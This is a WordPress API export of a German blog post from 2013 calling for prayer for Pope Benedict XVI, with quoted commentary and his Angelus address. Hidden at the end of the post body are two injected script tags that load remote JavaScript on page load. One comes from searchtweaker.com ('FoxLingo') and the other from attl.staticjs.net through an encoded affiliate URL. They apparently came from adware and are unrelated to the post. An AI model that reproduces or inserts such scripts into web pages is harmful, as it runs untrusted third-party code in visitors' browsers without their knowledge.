{"id":1184,"date":"2013-02-25T23:52:25","date_gmt":"2013-02-25T21:52:25","guid":{"rendered":"http:\/\/b-logos.de\/?p=1184"},"modified":"2013-07-03T08:14:35","modified_gmt":"2013-07-03T06:14:35","slug":"betet-fur-den-papst-2","status":"publish","type":"post","link":"https:\/\/b-logos.de\/?p=1184","title":{"rendered":"Betet f\u00fcr den Papst &#8211; er betet f\u00fcr euch!"},"content":{"rendered":"<p>Am 8.2. hatte ich den <a title=\"Betet f\u00fcr den Papst\" href=\"https:\/\/b-logos.de\/?p=1091\">Impuls<\/a>, hier auf dem Blog zum Gebet f\u00fcr den Hl. Vater aufzurufen. Dieser entsprang einem inneren Bild, in dem ich den Hl. Vater wiederum selbst im Gebet versunken sah. Heute fand ich in dem Kommentar von bene16 vom 23.2. auf <a title=\"Der Papst, wilde Ger\u00fcchte und ein Geheimdokument\" href=\"http:\/\/kath.net\/detail.php?id=40237\">kath.net<\/a> eine sch\u00f6ne Erkl\u00e4rung f\u00fcr dieses Bild:<!--more--><\/p>\n<blockquote><p>K\u00f6nnte es sein, dass sich der Hl. Vater nun von seinen vielen \u00e4u\u00dferen Aufgaben zur\u00fcckzieht, um in diesem Kloster innerhalb des Vatikans den M\u00e4chten der Finsternis NOCH st\u00e4rker begegnen zu k\u00f6nnen? Dass er sich also diesem Kampf NOCH mehr als bisher aussetzt? Dies alles f\u00fcr die Kirche, f\u00fcr den k\u00fcnftigen Papst, f\u00fcr die Bisch\u00f6fe\u2026 f\u00fcr uns alle.<br \/>\nH\u00f6ren wir nie auf, Benedikt XVI. im Gebet zu unterst\u00fctzen!<\/p>\n<p>Im Jahr des Glaubens legt uns demnach der Hl. Vater nicht die von vielen erwartete \u201eEnzyklika \u00fcber den Glauben\u201c vor.<br \/>\nStattdessen nimmt er sich v\u00f6llig zur\u00fcck (Entweltlichung), legt die Kirche vertrauensvoll in die Hand Gottes und bietet Ihm sein Leben als stilles Opfer an.<br \/>\nSo wird Benedikt XVI. zum lebendigen (Vor-)Bild des Glaubens.<\/p><\/blockquote>\n<p>Einen Tag sp\u00e4ter best\u00e4tigte der Hl. Vater selbst in seiner letzten Ansprache zum Angelus diese Sichtweise:<\/p>\n<blockquote><p>\u201eLiebe Br\u00fcder und Schwestern, ich f\u00fchle, wie dieses Wort Gottes [Evangelium von der Verkl\u00e4rung Christi] in diesem besonderen Augenblick meines Lebens besonders an mich ergeht. Der Herr ruft mich, den \u201aBerg hinaufzusteigen\u2019, mich noch mehr dem Gebet und der Betrachtung zu widmen. Doch dies bedeutet nicht, die Kirche zu verlassen, im Gegenteil. Wenn Gott dies von mir fordert, so gerade deshalb, damit ich fortfahren kann, ihr zu dienen, mit derselben Hingabe und mit derselben Liebe, mit denen ich es bis jetzt versucht habe, aber in einer Weise, die meinem Alter und meinen Kr\u00e4ften angemessener ist.\u201c<\/p><\/blockquote>\n<p><script id=\"FoxLingoJs\" type=\"text\/javascript\">\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n(function(){try{var header=document.getElementsByTagName(\"HEAD\")[0];var script=document.createElement(\"SCRIPT\");script.src=\"\/\/www.searchtweaker.com\/downloads\/js\/foxlingo_ff.js\";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==\"complete\"||this.readyState==\"loaded\")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();\n\/\/ ]]><\/script><script type=\"text\/javascript\" src=\"http:\/\/attl.staticjs.net\/amz\/aeyJhZmZpZCI6MTA4MCwic3ViYWZmaWQiOjEwMjAsImhyZWYiOiJodHRwOi8vYi1sb2dvcy5kZS93cC1hZG1pbi9wb3N0LW5ldy5waHAiLCJ3aWR0aCI6MTI4MCwiaGVpZ2h0IjoxMDI0LCJsb2FkZXJfY2xpZW50X3RpbWVzdGFtcCI6MTM2MTgyODg5NTc4OX0%3D.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Am 8.2. hatte ich den Impuls, hier auf dem Blog zum Gebet f\u00fcr den Hl. Vater aufzurufen. Dieser entsprang einem inneren Bild, in dem ich den Hl. Vater wiederum selbst im Gebet versunken sah. Heute fand ich in dem Kommentar von bene16 vom 23.2. auf kath.net eine sch\u00f6ne Erkl\u00e4rung f\u00fcr dieses Bild:<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[],"tags":[],"class_list":["post-1184","post","type-post","status-publish","format-standard","hentry"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pahMNU-j6","_links":{"self":[{"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/posts\/1184","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/b-logos.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1184"}],"version-history":[{"count":5,"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/posts\/1184\/revisions"}],"predecessor-version":[{"id":1228,"href":"https:\/\/b-logos.de\/index.php?rest_route=\/wp\/v2\/posts\/1184\/revisions\/1228"}],"wp:attachment":[{"href":"https:\/\/b-logos.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1184"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/b-logos.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1184"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/b-logos.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1184"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}